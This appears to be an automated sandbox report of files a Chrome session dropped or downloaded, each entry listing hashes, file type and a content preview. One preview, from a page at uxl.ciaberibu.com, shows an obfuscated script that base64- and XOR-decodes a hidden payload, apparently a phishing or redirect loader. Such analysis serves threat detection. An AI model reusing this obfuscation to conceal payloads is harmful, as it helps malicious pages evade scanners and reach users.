                                                                                                                              SHA-512:0A94004CD4D20E4D5AA18EC0F0614EF35C9F8D326372DE392A873C060A3275332CCC310E2D29CC2C268B5F76CD3A8A865B140264C980CAC19DE74C358FAEBFCB
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xy.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........".fn.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 19:36:09 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2681
                                                                                                                              Entropy (8bit):4.0105090159873535
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:7D806B2361D25D8055E968A599A603A7
                                                                                                                              SHA1:07D27E5474D069B2FD8D684BE249EB98D2BDC500
                                                                                                                              SHA-256:4DA250E2299F449B09DB20CEB7C2F0CB14EA571B8DA0F3B85932929B80E0AE27
                                                                                                                              SHA-512:3412C60D4FE4CFB38D85F0289A1943E96C2D6510C5F554035C66E1095F7AD33EC11FDB19722C84667C41B1409EBFE70C87545D9331E9CD955C82F3A9A5975B19
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:L..................F.@.. ...$+.,.....|..........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xy.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........".fn.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 19:36:10 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2681
                                                                                                                              Entropy (8bit):3.998667547486039
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:3C1A38AEC68AF613FDC105A44D088327
                                                                                                                              SHA1:1A6FD027D3DC7A7298157DDB5E50D2EA33A331FF
                                                                                                                              SHA-256:47896766C07351AC8966DFBCB9DA94DDCA512EAE5B2D9D18998DC7C8D3982A2C
                                                                                                                              SHA-512:4D30E8E69794DF860400169CD3F9BBC32545EE95A966A143FBA2541F7A6987AA45284DCE109F3497CD803F5D75ADB6CB84616F030342AA515D65FA37E13B4693
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:L..................F.@.. ...$+.,....C...........y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xy.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........".fn.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Mon Jul 29 19:36:09 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2683
                                                                                                                              Entropy (8bit):4.011440316907703
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:C00103211A88AF1444EFA30FDCABE31E
                                                                                                                              SHA1:AA1D35844C8E647D97F4C87A6ADA147F299135D5
                                                                                                                              SHA-256:B54C3FE7FBBFEA01A030F8147FF206BFAAC47EA6AD1A5FB910C339A208910557
                                                                                                                              SHA-512:CD68EDE09B671DA8B49DC8E1B12B387BD9F60CC94C740FD284209F97E2B61780E71FF4201FCDF8EF15D7FB3E678892AF50789A25A69EDD38DC6EABEA7774BD2E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:L..................F.@.. ...$+.,................y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.Xy.....B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........".fn.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (1505), with CRLF line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):1872
                                                                                                                              Entropy (8bit):6.001031890592952
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:E53E80841348A34C8508DE48C3EBD166
                                                                                                                              SHA1:3A5491B64B441E9737743F027F42F3F1F57BC86C
                                                                                                                              SHA-256:F141D8F56C8058C845AA38C68FB023F7D4D0A0C9409E857C8926C2754A4346D8
                                                                                                                              SHA-512:324F512C823522981425002C7C4CDF17CAA1C23B80447D933C110E5E54464AC6F4C580A3D8F2FACCEA982F90CDE3A0FE78F800AAC1AA2A25AAC33C9AF13FD0A0
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/8knW2ib/
                                                                                                                              Preview:<script>..function UutEQNHbSI(ydXolmCwHv, euPdtCTAKx) {..let mmSpUwRDkU = '';..ydXolmCwHv = atob(ydXolmCwHv);..let BtbTZlgBkV = euPdtCTAKx.length;..for (let i = 0; i < ydXolmCwHv.length; i++) {.. mmSpUwRDkU += String.fromCharCode(ydXolmCwHv.charCodeAt(i) ^ euPdtCTAKx.charCodeAt(i % BtbTZlgBkV));..}..return mmSpUwRDkU;..}..var KdzgHQKoBv = UutEQNHbSI(`Q3ByKQZHPCUdSkNwODsXFR06LxUFCyUQKH91aEkDJxQqNRIbOToKFToTITRLXTQmAVo9DywpEUd9ZEBPQ3AGNSNUHiQCPgMwbmdFfToTCD8/EQQXLxsmJQUdOlJpeUIceyUGBGZTdVdvUyA7CgAnFSB6CHghOS4XPREoMk1DAxQcAiICLykRHHUuZH5uWm56EUcsdRJ5RFpuekUVdXVJBisOOygLFTchBhVmGzo1Bx0jAygBOBY2OxZBfHxJSXNaOAwkQCM5ERU9DnVXbxV1dUkJbhkvLgZddX0MBjxTbiFoP3V1SVRuWm56F1AhIBsabhwvNhZQblhjVG5abidoPyhYYx0oUgY1I1QeJAI+AzBuZ1gVd3dAD0NwbnpFFSI8BxAhDWA2ClY0IQAbIFQmKABTdWhJAycUKjUSGzk6ChU6EyE0S0U0IQEaLxcrek4Vd2pLVGVabBFHDlhfFHlEEyhyLVoTNCIFJTADEEUUaGhJVmxTNVdvFXV1SR0oWmY3KEE5EgoHJRwmci1aEzQiBSUwAxBMHHUuZH5uWm56E1QndSo6IgsPNydSJwNJSW4bOjUHHR06LxUFCyUQKH98bmR+blpuehNUJ3U5PyowLRQOTDweSUluUg0UCUQUOCsTPCxg
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):7181
                                                                                                                              Entropy (8bit):4.923999843121706
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:5E82C96E073202A80EFDE2747BB978EB
                                                                                                                              SHA1:2893E9A57FAB99E64D27EE00A06021AFDF044AE0
                                                                                                                              SHA-256:1FDAB916AD51117BB5F3500AD8C6DF3B509ABBDBBD7657BE2AE841A8B683F16B
                                                                                                                              SHA-512:635F21DE6E5B05292D4EB82AE1781075A7D80724C973C40238F61E6269A8075FBBB0699D6C6DA5BFBCDCED8BCF118F74360D74033FF36DB2E549F5595B5AB246
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:{"code":200,"data":{"deck":{"id":4017922,"viewMode":"0","name":"Attainable Solutions","state":"1","organizationId":null,"type":"0","activeDeckDataId":544099,"ownerUser":null,"deckQAs":[],"deckTipGroups":[],"deckPrompt":null,"deckShare":null,"userDecks":[]},"deckData":{"id":544099,"sessionId":"615c5afe-9e8d-44ce-86a1-68081c5a79d7","versionName":null,"data":{"userThemePreferences":{"colorMap":{}},"slides":[{"slideId":17104433,"slideTempId":"0a6a69d2-e903-4bb6-b353-9cf083f2618e","slideDataId":5266337,"isMaster":false,"isDeleted":false,"orderIndex":1,"soundUrl":null}],"notes":{"icons":[]},"parameters":{}},"theme":{"id":2,"name":"tokyo","themeCategoryId":1,"data":{"colorMap":{"background":{"default":{"colors":["fourth"]},"swap":{"colors":["first"]}},"textHighlight":{"default":{"colors":["fourth"]},"swap":{"colors":["first"]}},"textHighlightBg":{"default":{"colors":["first"]},"swap":{"colors":["fourth"]}},"jumbo":{"default":{"colors":["first"]},"swap":{"colors":["fourth"]}},"title":{"default
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (32293)
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):358838
                                                                                                                              Entropy (8bit):5.555739340457104
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:559FAD08A7EE87FBAFFD2F4C01F3D759
                                                                                                                              SHA1:9C714B14D2D0D9C4DA1A56EB87B2AFE7158C6237
                                                                                                                              SHA-256:4CF61EF37DDDCB5FA5519FC776CC59BF667229AC8860DCA09A23F8777F098841
                                                                                                                              SHA-512:8E80BC0D19B94C8A21B7BC8AADFC27BE66E37AE8C836ACBA33F79457136A16C3E1A720E04618715E267505E8140F77E4CCEDC6565A71E0E78D44221619EA03BB
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"115",. . "macros":[{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__e"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp_useHashAutoLink":false,"vtp_decorateFormsAutoLink":false,"vtp_enableLinkId":false,"vtp_enableEcommerce":false,"vtp_trackingId":"UA-150754925-2","vtp_enableRecaptchaOption":false,"vtp_enableUaRlsa":false,"vtp_enableUseInternalVersion":false,"vtp_enableGA4Schema":true},{"function":"__gas","vtp_cookieDomain":"auto","vtp_doubleClick":false,"vtp_setTrackerName":false,"vtp_useDebugVersion":false,"vtp
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1864
                                                                                                                              Entropy (8bit):5.222032823730197
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (1572)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):67869
                                                                                                                              Entropy (8bit):5.470792131786056
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:0F5400D1A4BF177BADD0404E595BCC34
                                                                                                                              SHA1:55DE9F078A52C8EF840CFAC37861E71FB7DA32AA
                                                                                                                              SHA-256:31DDE1A7801265C2CC8342497284AD8610A3EFE9E8FBF640EA1D4B483AEAD587
                                                                                                                              SHA-512:7DBC3F7116A218AF055701FBDA2875D23E60DE10D8C845C19C0B847A4CF5609F068EB1E529522DCDD99FBA15E709D0539F1B42CCB5EABFD397AEB130F5968217
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:"https://fonts.googleapis.com/css2?family=Inter:wght@100..900&family=Merriweather:ital,wght@0,300;0,400;0,700;0,900;1,300;1,400;1,700;1,900&family=Nunito:ital,wght@0,200..1000;1,200..1000&family=Open+Sans:ital,wght@0,300..800;1,300..800&family=Playfair+Display:ital,wght@0,400..900;1,400..900&family=Raleway:ital,wght@0,100..900;1,100..900&family=Roboto:ital,wght@0,100;0,300;0,400;0,500;0,700;0,900;1,100;1,300;1,400;1,500;1,700;1,900&display=swap"
                                                                                                                              Preview:/* cyrillic-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2JL7SUc.woff2) format('woff2');. unicode-range: U+0460-052F, U+1C80-1C88, U+20B4, U+2DE0-2DFF, U+A640-A69F, U+FE2E-FE2F;.}./* cyrillic */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa0ZL7SUc.woff2) format('woff2');. unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;.}./* greek-ext */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100 900;. font-display: swap;. src: url(https://fonts.gstatic.com/s/inter/v13/UcC73FwrK3iLTeHuS_fvQtMwCp50KnMa2ZL7SUc.woff2) format('woff2');. unicode-range: U+1F00-1FFF;.}./* greek */.@font-face {. font-family: 'Inter';. font-style: normal;. font-weight: 100 900;. f
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):93
                                                                                                                              Entropy (8bit):4.961006596371384
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:0DDC5F5E64B411499A5436E34E34880A
                                                                                                                              SHA1:AAEE9220C5A329D3A4C1B35D73370F8BF564AAFA
                                                                                                                              SHA-256:B013DE4AE5DDA3589853ED201F75EDE72D09D4F1FFC00E7278689F1202A1AED0
                                                                                                                              SHA-512:23CA587AE5305E26DED8D66919F77275918297C46AA2A398CE51AFBCB98142400D5F158242F23232ECA81819B9E81669024E13B746A518ED0809D14386F4CB29
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:{"code":404,"data":null,"message":"GET /api/public/decks/4017922/visit - API path not found"}
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):268
                                                                                                                              Entropy (8bit):5.111190711619041
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                              SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                              SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                              SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://uxl.ciaberibu.com/op4EQm17ZeTVjspnYYJtpXcxBGeuvhjfMYLY5bKEj17Ckef193
                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:ASCII text, with very long lines (3567), with no line terminators
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):3567
                                                                                                                              Entropy (8bit):5.32203621037149
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:C52AA1EA682AEF8AD5EBF7AFF9662E35
                                                                                                                              SHA1:E171DA979A8C5DFB1DEF6A4ED2F4C72BB787CD18
                                                                                                                              SHA-256:BCE4B47B8FC12DE49FAC0A00E9039E38AA568ABA0EE9154B93D20465F0289CFA
                                                                                                                              SHA-512:BD010B3C92B9737B31F70E3EF108B11093075EFA80CC096B6BB3E9591DAD6E5420B50D6E949F9D2DAFBB420514906667282ED155F8E355A5738D965ED3226D34
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://cdn.taboola.com/scripts/cds-pips.js
                                                                                                                              Preview:!function(t){try{var e="https://",n="aHR0cHM6Ly9waXBzLnRhYm9vbGEuY29t",r=["YXJjaGl0ZWN0dXJl","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="],a=["YnJhbmRz","bW9iaWxl","bW9kZWw=","cGxhdGZvcm0=","cGxhdGZvcm1WZXJzaW9u","dWFGdWxsVmVyc2lvbg=="];t.TRC.cdsPips={userId:null,getHttpsPrefix:function t(){return e},doNothing:function t(){return!0},safeGetTfaConfig:function e(n,r,a){return t._tfa&&t._tfa.config&&t._tfa.config.safeGet&&t._tfa.config.safeGet(n,r,a)},safeGetRboxConfig:function t(e){var n;return(TRCImpl?TRCImpl.global:{})[e]},prepareGenericRequest:function e(n,r){var a,s=new(t.XDomainRequest||t.XMLHttpRequest);return s.open(n,r),s.onload=this.doNothing,s.onerror=this.doNothing,s.onprogress=this.doNothing,s},tryToReadUserIdFromLocalStorage:function t(){try{return window.localStorage["taboola global:user-id"]}catch(t){return null}},getUserId:function e(){var n=t.TFASC&&t.TFASC.tfaUserId&&"function"==typeof t.TFASC.tfaUserId.getUserId?t.TFASC.tfaUserId.getUserId():null,r=t.TRC.pageManager&&
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text, with very long lines (678)
                                                                                                                              Category:downloaded
                                                                                                                              Size (bytes):543753
                                                                                                                              Entropy (8bit):5.709185139798526
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:2EA96F82197C227AD3D999F6A6FCF54D
                                                                                                                              SHA1:DC1499948A1822D16CAB150EAEE16F4AB8C028D8
                                                                                                                              SHA-256:E1D667D61BB50E0A815101A7D0D7F379B7219776FEE856EEDBE965A049DB8D44
                                                                                                                              SHA-512:DAFEE1D415487B796E02EF295073382AAC48AC76E90C749028A9241BD44EC04EC2EE34163B8177F94D01E9E9D87577EC34C18D780A9F17B80923106D992749A9
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              URL:https://www.gstatic.com/recaptcha/releases/Xv-KF0LlBu_a0FJ9I5YSlX5m/recaptcha__en.js
                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. SPDX-License-Identifier: Apache-2.0.*/.var q=function(){return[function(g,v,V,X,K,z,W){if(!(g-(z=[2,"call","V"],5)>>4)){if(q6[z[1]](this),!Array.isArray(v)||!Array.isArray(V))throw Error("Start and end parameters must be arrays");if(v.length!=V.length)throw Error("Start and end points must be the same length");this.L=(this.progress=0,(this.coords=[],this.D=v,this)[z[this.duration=X,2]]=V,K)}if(g-z[0]<<z[(g+9&7)==1&&(V=V===void 0?null:V,W={then:function(D,k){return(V&&V(D,k),q)[0](72,v.then(D,k))},"catch":function(D){return q[0](40,v.then(void 0,.D),V)}}),0]>=g&&(g+z[0]^21)<g)l[z[1]](this,v);return(g>>1&13)==1&&(W=(v.stack||"").split(b9)[0]),W},function(g,v,V,X,K,z,W,D,k){if
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):79
                                                                                                                              Entropy (8bit):2.716326985350135
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:8E3DB10AF5A3E1CABE7AA67674E21188
                                                                                                                              SHA1:E2314B0038DF2D49DDBE461F33A6797D4586CDE0
                                                                                                                              SHA-256:87ECD5BABD6FD9F4F6F796D745AA38751FAF3985E3B55F87A2F53E506FE07362
                                                                                                                              SHA-512:A4F136016F4591E021D54F06141896581371828BF02F662A050B2A36567DFEC6068A4C758815D481E01BD7D68692329B5EE228C854AB2D85246D05B56692FB09
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:[71, 73, 70, 56, 57, 97, 1, 0, 1, 0, 0, 0, 0, 44, 0, 0, 0, 0, 1, 0, 1, 0, 0, 2]
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1400
                                                                                                                              Entropy (8bit):7.808470583085035
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:333EE830E5AB72C41DD9126A27B4D878
                                                                                                                              SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                                                                                              SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                                                                                              SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
                                                                                                                              Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              File Type:HTML document, ASCII text
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):65
                                                                                                                              Entropy (8bit):4.0299097360388085
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:
                                                                                                                              MD5:2489B6BEDA4E86203D22D9C4D2E67094
                                                                                                                              SHA1:590C361A0E91BB56D08DDEC98BF49A02E017D191
                                                                                                                              SHA-256:E7112B70EED95D42B178135728E6153E34F07001827870748DE87CD7DEC3538E
                                                                                                                              SHA-512:2DB08EB201F83DD7C2B7293A1E8375C0FE06B1787E21EC0D2F6EF3BC9D5355CCC06208B79FF2457C0175B30A1643AE3B624684E4E834AFDEEA727D7E61A0FB3C
                                                                                                                              Malicious:false
                                                                                                                              Reputation:unknown
